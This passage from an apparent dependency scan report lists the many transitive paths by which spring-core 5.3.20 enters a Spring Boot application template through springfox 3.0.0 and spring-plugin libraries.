  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
